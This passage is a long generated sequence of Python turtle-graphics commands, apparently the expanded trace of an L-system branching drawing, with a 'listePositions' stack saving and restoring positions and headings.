right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((35.81,102.44)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,117.22), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,117.22)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,117.22), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,117.22)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,133.22), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,133.22)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((41.93,133.22), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,133.22)), setheading(90.0) ;
pu(), setposition((24.49,91.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,105.91), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,105.91)), setheading(90.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,105.91), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,105.91)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,121.91), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,121.91)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((18.37,121.91), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,121.91)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((24.49,136.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,136.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0), ((24.49,136.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,136.69)), setheading(67.5) ;
pu(), setposition((24.49,91.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,105.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,105.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,105.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,105.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,120.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,120.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((51.52,126.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,126.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((51.52,126.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,126.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((62.83,138.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,138.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((62.83,138.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,138.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((68.96,152.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,152.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 45.0), ((68.96,152.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,152.91)), setheading(67.5) ;
pu(), setposition((36.74,120.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((36.74,136.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,136.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((36.74,136.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,136.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((42.86,151.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,151.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((42.86,151.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,151.47)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((54.17,162.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,162.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((36.74,120.69), 67.5), ((54.17,162.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,162.79)), setheading(45.0) ;
pu(), setposition((36.74,120.69)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((48.05,132.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,132.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((48.05,132.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,132.01)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((59.37,143.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((59.37,143.32)), setheading(45.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((75.37,143.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.37,143.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((75.37,143.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.37,143.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((90.15,149.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.15,149.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((90.15,149.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.15,149.44)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((101.46,160.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.46,160.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 22.5), ((101.46,160.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.46,160.76)), setheading(45.0) ;
pu(), setposition((59.37,143.32)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((65.49,158.10), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.49,158.10)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((65.49,158.10), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.49,158.10)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((76.80,169.42), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.80,169.42)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((76.80,169.42), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.80,169.42)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((91.58,175.54), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.58,175.54)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((59.37,143.32), 45.0), ((91.58,175.54), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((91.58,175.54)), setheading(22.5) ;
pu(), setposition((59.37,143.32)), setheading(45.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((30.61,73.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,73.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((30.61,73.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,73.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,88.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,88.69)), setheading(67.5) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((51.52,94.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,94.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((51.52,94.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((51.52,94.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((62.83,106.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,106.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((62.83,106.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((62.83,106.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((68.96,120.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,120.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 45.0), ((68.96,120.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.96,120.91)), setheading(67.5) ;
pu(), setposition((36.74,88.69)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((36.74,104.69), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,104.69)), setheading(67.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((36.74,104.69), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,104.69)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((42.86,119.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,119.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((42.86,119.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,119.47)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((54.17,130.79), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,130.79)), setheading(22.5) ;
left(22.5) ;
listePositions = [((36.74,88.69), 67.5), ((54.17,130.79), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,130.79)), setheading(45.0) ;
pu(), setposition((36.74,88.69)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((42.86,103.47), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,103.47)), setheading(45.0) ;
left(22.5) ;
listePositions = [((42.86,103.47), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,103.47)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((75.08,135.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,135.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((75.08,135.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,135.69)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((81.20,150.48), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,150.48)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((81.20,150.48), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,150.48)), setheading(67.5) ;
pu(), setposition((48.98,118.26)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,134.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,134.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,149.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,149.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,149.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,149.04)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((66.42,160.35), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,160.35)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((66.42,160.35), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,160.35)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(22.5) ;
